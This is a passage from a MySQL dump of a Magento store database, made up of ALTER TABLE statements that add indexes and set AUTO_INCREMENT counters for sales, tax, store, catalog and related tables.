  ADD KEY `SALES_SHIPMENT_GRID_ORDER_STATUS` (`order_status`),
  ADD KEY `SALES_SHIPMENT_GRID_CREATED_AT` (`created_at`),
  ADD KEY `SALES_SHIPMENT_GRID_UPDATED_AT` (`updated_at`),
  ADD KEY `SALES_SHIPMENT_GRID_ORDER_CREATED_AT` (`order_created_at`),
  ADD KEY `SALES_SHIPMENT_GRID_SHIPPING_NAME` (`shipping_name`),
  ADD KEY `SALES_SHIPMENT_GRID_BILLING_NAME` (`billing_name`);
ALTER TABLE `sales_shipment_grid` ADD FULLTEXT KEY `FTI_086B40C8955F167B8EA76653437879B4` (`increment_id`,`order_increment_id`,`shipping_name`,`customer_name`,`customer_email`,`billing_address`,`shipping_address`);

--
-- Indexes for table `sales_shipment_item`
--
ALTER TABLE `sales_shipment_item`
  ADD PRIMARY KEY (`entity_id`),
  ADD KEY `SALES_SHIPMENT_ITEM_PARENT_ID` (`parent_id`);

--
-- Indexes for table `sales_shipment_track`
--
ALTER TABLE `sales_shipment_track`
  ADD PRIMARY KEY (`entity_id`),
  ADD KEY `SALES_SHIPMENT_TRACK_PARENT_ID` (`parent_id`),
  ADD KEY `SALES_SHIPMENT_TRACK_ORDER_ID` (`order_id`),
  ADD KEY `SALES_SHIPMENT_TRACK_CREATED_AT` (`created_at`);

--
-- Indexes for table `sales_shipping_aggregated`
--
ALTER TABLE `sales_shipping_aggregated`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `SALES_SHPP_AGGRED_PERIOD_STORE_ID_ORDER_STS_SHPP_DESCRIPTION` (`period`,`store_id`,`order_status`,`shipping_description`),
  ADD KEY `SALES_SHIPPING_AGGREGATED_STORE_ID` (`store_id`);

--
-- Indexes for table `sales_shipping_aggregated_order`
--
ALTER TABLE `sales_shipping_aggregated_order`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `UNQ_C05FAE47282EEA68654D0924E946761F` (`period`,`store_id`,`order_status`,`shipping_description`),
  ADD KEY `SALES_SHIPPING_AGGREGATED_ORDER_STORE_ID` (`store_id`);

--
-- Indexes for table `scconnector_google_feed_cl`
--
ALTER TABLE `scconnector_google_feed_cl`
  ADD PRIMARY KEY (`version_id`);

--
-- Indexes for table `scconnector_google_remove_cl`
--
ALTER TABLE `scconnector_google_remove_cl`
  ADD PRIMARY KEY (`version_id`);

--
-- Indexes for table `search_query`
--
ALTER TABLE `search_query`
  ADD PRIMARY KEY (`query_id`),
  ADD UNIQUE KEY `SEARCH_QUERY_QUERY_TEXT_STORE_ID` (`query_text`,`store_id`),
  ADD KEY `SEARCH_QUERY_QUERY_TEXT_STORE_ID_POPULARITY` (`query_text`,`store_id`,`popularity`),
  ADD KEY `SEARCH_QUERY_STORE_ID` (`store_id`),
  ADD KEY `SEARCH_QUERY_IS_PROCESSED` (`is_processed`),
  ADD KEY `SEARCH_QUERY_STORE_ID_POPULARITY` (`store_id`,`popularity`);

--
-- Indexes for table `search_synonyms`
--
ALTER TABLE `search_synonyms`
  ADD PRIMARY KEY (`group_id`),
  ADD KEY `SEARCH_SYNONYMS_STORE_ID` (`store_id`),
  ADD KEY `SEARCH_SYNONYMS_WEBSITE_ID` (`website_id`);
ALTER TABLE `search_synonyms` ADD FULLTEXT KEY `SEARCH_SYNONYMS_SYNONYMS` (`synonyms`);

--
-- Indexes for table `sendfriend_log`
--
ALTER TABLE `sendfriend_log`
  ADD PRIMARY KEY (`log_id`),
  ADD KEY `SENDFRIEND_LOG_IP` (`ip`),
  ADD KEY `SENDFRIEND_LOG_TIME` (`time`);

--
-- Indexes for table `sequence_creditmemo_0`
--
ALTER TABLE `sequence_creditmemo_0`
  ADD PRIMARY KEY (`sequence_value`);

--
-- Indexes for table `sequence_creditmemo_1`
--
ALTER TABLE `sequence_creditmemo_1`
  ADD PRIMARY KEY (`sequence_value`);

--
-- Indexes for table `sequence_invoice_0`
--
ALTER TABLE `sequence_invoice_0`
  ADD PRIMARY KEY (`sequence_value`);

--
-- Indexes for table `sequence_invoice_1`
--
ALTER TABLE `sequence_invoice_1`
  ADD PRIMARY KEY (`sequence_value`);

--
-- Indexes for table `sequence_order_0`
--
ALTER TABLE `sequence_order_0`
  ADD PRIMARY KEY (`sequence_value`);

--
-- Indexes for table `sequence_order_1`
--
ALTER TABLE `sequence_order_1`
  ADD PRIMARY KEY (`sequence_value`);

--
-- Indexes for table `sequence_shipment_0`
--
ALTER TABLE `sequence_shipment_0`
  ADD PRIMARY KEY (`sequence_value`);

--
-- Indexes for table `sequence_shipment_1`
--
ALTER TABLE `sequence_shipment_1`
  ADD PRIMARY KEY (`sequence_value`);

--
-- Indexes for table `session`
--
ALTER TABLE `session`
  ADD PRIMARY KEY (`session_id`);

--
-- Indexes for table `setup_module`
--
ALTER TABLE `setup_module`
  ADD PRIMARY KEY (`module`);

--
-- Indexes for table `shipping_tablerate`
--
ALTER TABLE `shipping_tablerate`
  ADD PRIMARY KEY (`pk`),
  ADD UNIQUE KEY `UNQ_D60821CDB2AFACEE1566CFC02D0D4CAA` (`website_id`,`dest_country_id`,`dest_region_id`,`dest_zip`,`condition_name`,`condition_value`);

--
-- Indexes for table `signifyd_case`
--
ALTER TABLE `signifyd_case`
  ADD PRIMARY KEY (`entity_id`),
  ADD UNIQUE KEY `SIGNIFYD_CASE_ORDER_ID` (`order_id`),
  ADD UNIQUE KEY `SIGNIFYD_CASE_CASE_ID` (`case_id`);

--
-- Indexes for table `sitemap`
--
ALTER TABLE `sitemap`
  ADD PRIMARY KEY (`sitemap_id`),
  ADD KEY `SITEMAP_STORE_ID` (`store_id`);

--
-- Indexes for table `store`
--
ALTER TABLE `store`
  ADD PRIMARY KEY (`store_id`),
  ADD UNIQUE KEY `STORE_CODE` (`code`),
  ADD KEY `STORE_WEBSITE_ID` (`website_id`),
  ADD KEY `STORE_IS_ACTIVE_SORT_ORDER` (`is_active`,`sort_order`),
  ADD KEY `STORE_GROUP_ID` (`group_id`);

--
-- Indexes for table `store_group`
--
ALTER TABLE `store_group`
  ADD PRIMARY KEY (`group_id`),
  ADD UNIQUE KEY `STORE_GROUP_CODE` (`code`),
  ADD KEY `STORE_GROUP_WEBSITE_ID` (`website_id`),
  ADD KEY `STORE_GROUP_DEFAULT_STORE_ID` (`default_store_id`);

--
-- Indexes for table `store_website`
--
ALTER TABLE `store_website`
  ADD PRIMARY KEY (`website_id`),
  ADD UNIQUE KEY `STORE_WEBSITE_CODE` (`code`),
  ADD KEY `STORE_WEBSITE_SORT_ORDER` (`sort_order`),
  ADD KEY `STORE_WEBSITE_DEFAULT_GROUP_ID` (`default_group_id`);

--
-- Indexes for table `tax_calculation`
--
ALTER TABLE `tax_calculation`
  ADD PRIMARY KEY (`tax_calculation_id`),
  ADD KEY `TAX_CALCULATION_TAX_CALCULATION_RULE_ID` (`tax_calculation_rule_id`),
  ADD KEY `TAX_CALCULATION_CUSTOMER_TAX_CLASS_ID` (`customer_tax_class_id`),
  ADD KEY `TAX_CALCULATION_PRODUCT_TAX_CLASS_ID` (`product_tax_class_id`),
  ADD KEY `TAX_CALC_TAX_CALC_RATE_ID_CSTR_TAX_CLASS_ID_PRD_TAX_CLASS_ID` (`tax_calculation_rate_id`,`customer_tax_class_id`,`product_tax_class_id`);

--
-- Indexes for table `tax_calculation_rate`
--
ALTER TABLE `tax_calculation_rate`
  ADD PRIMARY KEY (`tax_calculation_rate_id`),
  ADD KEY `TAX_CALCULATION_RATE_TAX_COUNTRY_ID_TAX_REGION_ID_TAX_POSTCODE` (`tax_country_id`,`tax_region_id`,`tax_postcode`),
  ADD KEY `TAX_CALCULATION_RATE_CODE` (`code`),
  ADD KEY `IDX_CA799F1E2CB843495F601E56C84A626D` (`tax_calculation_rate_id`,`tax_country_id`,`tax_region_id`,`zip_is_range`,`tax_postcode`);

--
-- Indexes for table `tax_calculation_rate_title`
--
ALTER TABLE `tax_calculation_rate_title`
  ADD PRIMARY KEY (`tax_calculation_rate_title_id`),
  ADD KEY `TAX_CALCULATION_RATE_TITLE_TAX_CALCULATION_RATE_ID_STORE_ID` (`tax_calculation_rate_id`,`store_id`),
  ADD KEY `TAX_CALCULATION_RATE_TITLE_STORE_ID` (`store_id`);

--
-- Indexes for table `tax_calculation_rule`
--
ALTER TABLE `tax_calculation_rule`
  ADD PRIMARY KEY (`tax_calculation_rule_id`),
  ADD KEY `TAX_CALCULATION_RULE_PRIORITY_POSITION` (`priority`,`position`),
  ADD KEY `TAX_CALCULATION_RULE_CODE` (`code`);

--
-- Indexes for table `tax_class`
--
ALTER TABLE `tax_class`
  ADD PRIMARY KEY (`class_id`);

--
-- Indexes for table `tax_order_aggregated_created`
--
ALTER TABLE `tax_order_aggregated_created`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `TAX_ORDER_AGGRED_CREATED_PERIOD_STORE_ID_CODE_PERCENT_ORDER_STS` (`period`,`store_id`,`code`,`percent`,`order_status`),
  ADD KEY `TAX_ORDER_AGGREGATED_CREATED_STORE_ID` (`store_id`);

--
-- Indexes for table `tax_order_aggregated_updated`
--
ALTER TABLE `tax_order_aggregated_updated`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `TAX_ORDER_AGGRED_UPDATED_PERIOD_STORE_ID_CODE_PERCENT_ORDER_STS` (`period`,`store_id`,`code`,`percent`,`order_status`),
  ADD KEY `TAX_ORDER_AGGREGATED_UPDATED_STORE_ID` (`store_id`);

--
-- Indexes for table `theme`
--
ALTER TABLE `theme`
  ADD PRIMARY KEY (`theme_id`);

--
-- Indexes for table `theme_file`
--
ALTER TABLE `theme_file`
  ADD PRIMARY KEY (`theme_files_id`),
  ADD KEY `THEME_FILE_THEME_ID_THEME_THEME_ID` (`theme_id`);

--
-- Indexes for table `translation`
--
ALTER TABLE `translation`
  ADD PRIMARY KEY (`key_id`),
  ADD UNIQUE KEY `TRANSLATION_STORE_ID_LOCALE_CRC_STRING_STRING` (`store_id`,`locale`,`crc_string`,`string`);

--
-- Indexes for table `ui_bookmark`
--
ALTER TABLE `ui_bookmark`
  ADD PRIMARY KEY (`bookmark_id`),
  ADD KEY `UI_BOOKMARK_USER_ID_NAMESPACE_IDENTIFIER` (`user_id`,`namespace`,`identifier`);

--
-- Indexes for table `url_rewrite`
--
ALTER TABLE `url_rewrite`
  ADD PRIMARY KEY (`url_rewrite_id`),
  ADD UNIQUE KEY `URL_REWRITE_REQUEST_PATH_STORE_ID` (`request_path`,`store_id`),
  ADD KEY `URL_REWRITE_TARGET_PATH` (`target_path`),
  ADD KEY `URL_REWRITE_STORE_ID_ENTITY_ID` (`store_id`,`entity_id`),
  ADD KEY `URL_REWRITE_ENTITY_ID` (`entity_id`);

--
-- Indexes for table `variable`
--
ALTER TABLE `variable`
  ADD PRIMARY KEY (`variable_id`),
  ADD UNIQUE KEY `VARIABLE_CODE` (`code`);

--
-- Indexes for table `variable_value`
--
ALTER TABLE `variable_value`
  ADD PRIMARY KEY (`value_id`),
  ADD UNIQUE KEY `VARIABLE_VALUE_VARIABLE_ID_STORE_ID` (`variable_id`,`store_id`),
  ADD KEY `VARIABLE_VALUE_STORE_ID` (`store_id`);

--
-- Indexes for table `vault_payment_token`
--
ALTER TABLE `vault_payment_token`
  ADD PRIMARY KEY (`entity_id`),
  ADD UNIQUE KEY `VAULT_PAYMENT_TOKEN_PUBLIC_HASH` (`public_hash`),
  ADD UNIQUE KEY `VAULT_PAYMENT_TOKEN_PAYMENT_METHOD_CODE_CSTR_ID_GATEWAY_TOKEN` (`payment_method_code`,`customer_id`,`gateway_token`),
  ADD KEY `VAULT_PAYMENT_TOKEN_CUSTOMER_ID_CUSTOMER_ENTITY_ENTITY_ID` (`customer_id`);

--
-- Indexes for table `vault_payment_token_order_payment_link`
--
ALTER TABLE `vault_payment_token_order_payment_link`
  ADD PRIMARY KEY (`order_payment_id`,`payment_token_id`),
  ADD KEY `FK_4ED894655446D385894580BECA993862` (`payment_token_id`);

--
-- Indexes for table `vertex_customer_code`
--
ALTER TABLE `vertex_customer_code`
  ADD PRIMARY KEY (`customer_id`);

--
-- Indexes for table `vertex_custom_option_flex_field`
--
ALTER TABLE `vertex_custom_option_flex_field`
  ADD PRIMARY KEY (`entity_id`),
  ADD UNIQUE KEY `VERTEX_CUSTOM_OPTION_FLEX_FIELD_OPTION_ID_WEBSITE_ID` (`option_id`,`website_id`);

--
-- Indexes for table `vertex_invoice_sent`
--
ALTER TABLE `vertex_invoice_sent`
  ADD PRIMARY KEY (`invoice_id`);

--
-- Indexes for table `vertex_order_invoice_status`
--
ALTER TABLE `vertex_order_invoice_status`
  ADD PRIMARY KEY (`order_id`);

--
-- Indexes for table `vertex_sales_creditmemo_item_invoice_text_code`
--
ALTER TABLE `vertex_sales_creditmemo_item_invoice_text_code`
  ADD UNIQUE KEY `UNQ_4BC40DA748D7713ADA661D2DE1BCF161` (`item_id`,`invoice_text_code`);

--
-- Indexes for table `vertex_sales_creditmemo_item_tax_code`
--
ALTER TABLE `vertex_sales_creditmemo_item_tax_code`
  ADD UNIQUE KEY `VERTEX_SALES_CREDITMEMO_ITEM_TAX_CODE_ITEM_ID_TAX_CODE` (`item_id`,`tax_code`);

--
-- Indexes for table `vertex_sales_creditmemo_item_vertex_tax_code`
--
ALTER TABLE `vertex_sales_creditmemo_item_vertex_tax_code`
  ADD UNIQUE KEY `UNQ_31D7AADB3412BC7E7C1C98D5CC3A5D46` (`item_id`,`vertex_tax_code`);

--
-- Indexes for table `vertex_sales_order_item_invoice_text_code`
--
ALTER TABLE `vertex_sales_order_item_invoice_text_code`
  ADD UNIQUE KEY `UNQ_96F6BE3160A4185CEA4D866018EAF6DC` (`item_id`,`invoice_text_code`);

--
-- Indexes for table `vertex_sales_order_item_tax_code`
--
ALTER TABLE `vertex_sales_order_item_tax_code`
  ADD UNIQUE KEY `VERTEX_SALES_ORDER_ITEM_TAX_CODE_ITEM_ID_TAX_CODE` (`item_id`,`tax_code`);

--
-- Indexes for table `vertex_sales_order_item_vertex_tax_code`
--
ALTER TABLE `vertex_sales_order_item_vertex_tax_code`
  ADD UNIQUE KEY `VERTEX_SALES_ORDER_ITEM_VERTEX_TAX_CODE_ITEM_ID_VERTEX_TAX_CODE` (`item_id`,`vertex_tax_code`);

--
-- Indexes for table `vertex_taxrequest`
--
ALTER TABLE `vertex_taxrequest`
  ADD PRIMARY KEY (`request_id`),
  ADD UNIQUE KEY `VERTEX_TAXREQUEST_REQUEST_ID` (`request_id`),
  ADD KEY `VERTEX_TAXREQUEST_REQUEST_TYPE` (`request_type`),
  ADD KEY `VERTEX_TAXREQUEST_ORDER_ID` (`order_id`);

--
-- Indexes for table `weee_tax`
--
ALTER TABLE `weee_tax`
  ADD PRIMARY KEY (`value_id`),
  ADD KEY `WEEE_TAX_WEBSITE_ID` (`website_id`),
  ADD KEY `WEEE_TAX_ENTITY_ID` (`entity_id`),
  ADD KEY `WEEE_TAX_COUNTRY` (`country`),
  ADD KEY `WEEE_TAX_ATTRIBUTE_ID` (`attribute_id`);

--
-- Indexes for table `widget`
--
ALTER TABLE `widget`
  ADD PRIMARY KEY (`widget_id`),
  ADD KEY `WIDGET_WIDGET_CODE` (`widget_code`);

--
-- Indexes for table `widget_instance`
--
ALTER TABLE `widget_instance`
  ADD PRIMARY KEY (`instance_id`),
  ADD KEY `WIDGET_INSTANCE_THEME_ID_THEME_THEME_ID` (`theme_id`);

--
-- Indexes for table `widget_instance_page`
--
ALTER TABLE `widget_instance_page`
  ADD PRIMARY KEY (`page_id`),
  ADD KEY `WIDGET_INSTANCE_PAGE_INSTANCE_ID` (`instance_id`);

--
-- Indexes for table `widget_instance_page_layout`
--
ALTER TABLE `widget_instance_page_layout`
  ADD UNIQUE KEY `WIDGET_INSTANCE_PAGE_LAYOUT_LAYOUT_UPDATE_ID_PAGE_ID` (`layout_update_id`,`page_id`),
  ADD KEY `WIDGET_INSTANCE_PAGE_LAYOUT_PAGE_ID` (`page_id`);

--
-- Indexes for table `wishlist`
--
ALTER TABLE `wishlist`
  ADD PRIMARY KEY (`wishlist_id`),
  ADD UNIQUE KEY `WISHLIST_CUSTOMER_ID` (`customer_id`),
  ADD KEY `WISHLIST_SHARED` (`shared`);

--
-- Indexes for table `wishlist_item`
--
ALTER TABLE `wishlist_item`
  ADD PRIMARY KEY (`wishlist_item_id`),
  ADD KEY `WISHLIST_ITEM_WISHLIST_ID` (`wishlist_id`),
  ADD KEY `WISHLIST_ITEM_PRODUCT_ID` (`product_id`),
  ADD KEY `WISHLIST_ITEM_STORE_ID` (`store_id`);

--
-- Indexes for table `wishlist_item_option`
--
ALTER TABLE `wishlist_item_option`
  ADD PRIMARY KEY (`option_id`),
  ADD KEY `FK_A014B30B04B72DD0EAB3EECD779728D6` (`wishlist_item_id`);

--
-- Indexes for table `yotpo_order_status_history`
--
ALTER TABLE `yotpo_order_status_history`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `yotpo_rich_snippets`
--
ALTER TABLE `yotpo_rich_snippets`
  ADD PRIMARY KEY (`rich_snippet_id`);

--
-- Indexes for table `yotpo_sync`
--
ALTER TABLE `yotpo_sync`
  ADD PRIMARY KEY (`sync_id`),
  ADD UNIQUE KEY `YOTPO_SYNC_STORE_ID_ENTITY_TYPE_ENTITY_ID` (`store_id`,`entity_type`,`entity_id`);

--
-- AUTO_INCREMENT for dumped tables
--

--
-- AUTO_INCREMENT for table `adminnotification_inbox`
--
ALTER TABLE `adminnotification_inbox`
  MODIFY `notification_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Notification ID', AUTO_INCREMENT=50;

--
-- AUTO_INCREMENT for table `admin_analytics_usage_version_log`
--
ALTER TABLE `admin_analytics_usage_version_log`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Log ID', AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `admin_passwords`
--
ALTER TABLE `admin_passwords`
  MODIFY `password_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Password ID', AUTO_INCREMENT=5;

--
-- AUTO_INCREMENT for table `admin_user`
--
ALTER TABLE `admin_user`
  MODIFY `user_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'User ID', AUTO_INCREMENT=3;

--
-- AUTO_INCREMENT for table `admin_user_session`
--
ALTER TABLE `admin_user_session`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Entity ID', AUTO_INCREMENT=124;

--
-- AUTO_INCREMENT for table `adobe_stock_asset`
--
ALTER TABLE `adobe_stock_asset`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Entity ID';

--
-- AUTO_INCREMENT for table `adobe_stock_category`
--
ALTER TABLE `adobe_stock_category`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Entity ID';

--
-- AUTO_INCREMENT for table `adobe_stock_creator`
--
ALTER TABLE `adobe_stock_creator`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'ID';

--
-- AUTO_INCREMENT for table `adobe_user_profile`
--
ALTER TABLE `adobe_user_profile`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Entity ID';

--
-- AUTO_INCREMENT for table `amazon_customer`
--
ALTER TABLE `amazon_customer`
  MODIFY `entity_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Entity_id';

--
-- AUTO_INCREMENT for table `amazon_pending_authorization`
--
ALTER TABLE `amazon_pending_authorization`
  MODIFY `entity_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Entity_id';

--
-- AUTO_INCREMENT for table `amazon_pending_capture`
--
ALTER TABLE `amazon_pending_capture`
  MODIFY `entity_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Entity_id';

--
-- AUTO_INCREMENT for table `amazon_pending_refund`
--
ALTER TABLE `amazon_pending_refund`
  MODIFY `entity_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Entity_id';

--
-- AUTO_INCREMENT for table `amazon_quote`
--
ALTER TABLE `amazon_quote`
  MODIFY `entity_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Entity ID';

--
-- AUTO_INCREMENT for table `amazon_sales_order`
--
ALTER TABLE `amazon_sales_order`
  MODIFY `entity_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Entity ID';

--
-- AUTO_INCREMENT for table `authorization_role`
--
ALTER TABLE `authorization_role`
  MODIFY `role_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Role ID', AUTO_INCREMENT=4;

--
-- AUTO_INCREMENT for table `authorization_rule`
--
ALTER TABLE `authorization_rule`
  MODIFY `rule_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Rule ID', AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `cataloginventory_stock`
--
ALTER TABLE `cataloginventory_stock`
  MODIFY `stock_id` smallint(5) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Stock ID', AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `cataloginventory_stock_item`
--
ALTER TABLE `cataloginventory_stock_item`
  MODIFY `item_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Item ID', AUTO_INCREMENT=2065;

--
-- AUTO_INCREMENT for table `catalogrule`
--
ALTER TABLE `catalogrule`
  MODIFY `rule_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Entity ID', AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `catalogrule_product`
--
ALTER TABLE `catalogrule_product`
  MODIFY `rule_product_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Rule Product ID';

--
-- AUTO_INCREMENT for table `catalogrule_product_price`
--
ALTER TABLE `catalogrule_product_price`
  MODIFY `rule_product_price_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Rule Product PriceId';

--
-- AUTO_INCREMENT for table `catalogrule_product_price_replica`
--
ALTER TABLE `catalogrule_product_price_replica`
  MODIFY `rule_product_price_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Rule Product PriceId';

--
-- AUTO_INCREMENT for table `catalogrule_product_replica`
--
ALTER TABLE `catalogrule_product_replica`
  MODIFY `rule_product_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Rule Product ID';

--
-- AUTO_INCREMENT for table `catalogsearch_recommendations`
--
ALTER TABLE `catalogsearch_recommendations`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'ID';

--
-- AUTO_INCREMENT for table `catalog_category_entity`
--
ALTER TABLE `catalog_category_entity`
  MODIFY `entity_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Entity ID', AUTO_INCREMENT=48;

--
-- AUTO_INCREMENT for table `catalog_category_entity_datetime`
--
ALTER TABLE `catalog_category_entity_datetime`
  MODIFY `value_id` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Value ID', AUTO_INCREMENT=17;

--
-- AUTO_INCREMENT for table `catalog_category_entity_decimal`
--
ALTER TABLE `catalog_category_entity_decimal`
  MODIFY `value_id` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Value ID';

--
-- AUTO_INCREMENT for table `catalog_category_entity_int`
--
ALTER TABLE `catalog_category_entity_int`
  MODIFY `value_id` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Value ID', AUTO_INCREMENT=170;

--
-- AUTO_INCREMENT for table `catalog_category_entity_text`
--
ALTER TABLE `catalog_category_entity_text`
  MODIFY `value_id` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Value ID', AUTO_INCREMENT=26;

--
-- AUTO_INCREMENT for table `catalog_category_entity_varchar`
--
ALTER TABLE `catalog_category_entity_varchar`
  MODIFY `value_id` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Value ID', AUTO_INCREMENT=213;

--
-- AUTO_INCREMENT for table `catalog_category_product`
--
ALTER TABLE `catalog_category_product`
  MODIFY `entity_id` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Entity ID', AUTO_INCREMENT=5226;

--
-- AUTO_INCREMENT for table `catalog_compare_item`
--
ALTER TABLE `catalog_compare_item`
  MODIFY `catalog_compare_item_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Compare Item ID', AUTO_INCREMENT=6;

--
-- AUTO_INCREMENT for table `catalog_product_bundle_option`
--
ALTER TABLE `catalog_product_bundle_option`
  MODIFY `option_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Option ID';

--
-- AUTO_INCREMENT for table `catalog_product_bundle_option_value`
--
ALTER TABLE `catalog_product_bundle_option_value`
  MODIFY `value_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Value ID';

--
-- AUTO_INCREMENT for table `catalog_product_bundle_selection`
--
ALTER TABLE `catalog_product_bundle_selection`
  MODIFY `selection_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Selection ID';

--
-- AUTO_INCREMENT for table `catalog_product_entity`
--
ALTER TABLE `catalog_product_entity`
  MODIFY `entity_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Entity ID', AUTO_INCREMENT=2065;

--
-- AUTO_INCREMENT for table `catalog_product_entity_datetime`
--
ALTER TABLE `catalog_product_entity_datetime`
  MODIFY `value_id` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Value ID', AUTO_INCREMENT=21;

--
-- AUTO_INCREMENT for table `catalog_product_entity_decimal`
--
ALTER TABLE `catalog_product_entity_decimal`
  MODIFY `value_id` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Value ID', AUTO_INCREMENT=3947;

--
-- AUTO_INCREMENT for table `catalog_product_entity_gallery`
--
ALTER TABLE `catalog_product_entity_gallery`
  MODIFY `value_id` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Value ID';

--
-- AUTO_INCREMENT for table `catalog_product_entity_int`
--
ALTER TABLE `catalog_product_entity_int`
  MODIFY `value_id` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Value ID', AUTO_INCREMENT=12721;

--
-- AUTO_INCREMENT for table `catalog_product_entity_media_gallery`
--
ALTER TABLE `catalog_product_entity_media_gallery`
  MODIFY `value_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Value ID', AUTO_INCREMENT=3466;

--
-- AUTO_INCREMENT for table `catalog_product_entity_media_gallery_value`
--
ALTER TABLE `catalog_product_entity_media_gallery_value`
  MODIFY `record_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Record ID', AUTO_INCREMENT=3512;

--
-- AUTO_INCREMENT for table `catalog_product_entity_text`
--
ALTER TABLE `catalog_product_entity_text`
  MODIFY `value_id` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Value ID', AUTO_INCREMENT=2093;

--
-- AUTO_INCREMENT for table `catalog_product_entity_tier_price`
--
ALTER TABLE `catalog_product_entity_tier_price`
  MODIFY `value_id` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Value ID';

--
-- AUTO_INCREMENT for table `catalog_product_entity_varchar`
--
ALTER TABLE `catalog_product_entity_varchar`
  MODIFY `value_id` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Value ID', AUTO_INCREMENT=15492;

--
-- AUTO_INCREMENT for table `catalog_product_frontend_action`
--
ALTER TABLE `catalog_product_frontend_action`
  MODIFY `action_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Product Action ID', AUTO_INCREMENT=5374;

--
-- AUTO_INCREMENT for table `catalog_product_link`
--
ALTER TABLE `catalog_product_link`
  MODIFY `link_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Link ID', AUTO_INCREMENT=8;

--
-- AUTO_INCREMENT for table `catalog_product_link_attribute`
--
ALTER TABLE `catalog_product_link_attribute`
  MODIFY `product_link_attribute_id` smallint(5) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Product Link Attribute ID', AUTO_INCREMENT=6;

--
-- AUTO_INCREMENT for table `catalog_product_link_attribute_decimal`
--
ALTER TABLE `catalog_product_link_attribute_decimal`
  MODIFY `value_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Value ID';

--
-- AUTO_INCREMENT for table `catalog_product_link_attribute_int`
--
ALTER TABLE `catalog_product_link_attribute_int`
  MODIFY `value_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Value ID', AUTO_INCREMENT=8;

--
-- AUTO_INCREMENT for table `catalog_product_link_attribute_varchar`
--
ALTER TABLE `catalog_product_link_attribute_varchar`
  MODIFY `value_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Value ID';

--
-- AUTO_INCREMENT for table `catalog_product_link_type`
--
ALTER TABLE `catalog_product_link_type`
  MODIFY `link_type_id` smallint(5) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Link Type ID', AUTO_INCREMENT=6;

--
-- AUTO_INCREMENT for table `catalog_product_option`
--
ALTER TABLE `catalog_product_option`
  MODIFY `option_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Option ID';

--
-- AUTO_INCREMENT for table `catalog_product_option_price`
--
ALTER TABLE `catalog_product_option_price`
  MODIFY `option_price_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Option Price ID';

--
-- AUTO_INCREMENT for table `catalog_product_option_title`
--
ALTER TABLE `catalog_product_option_title`
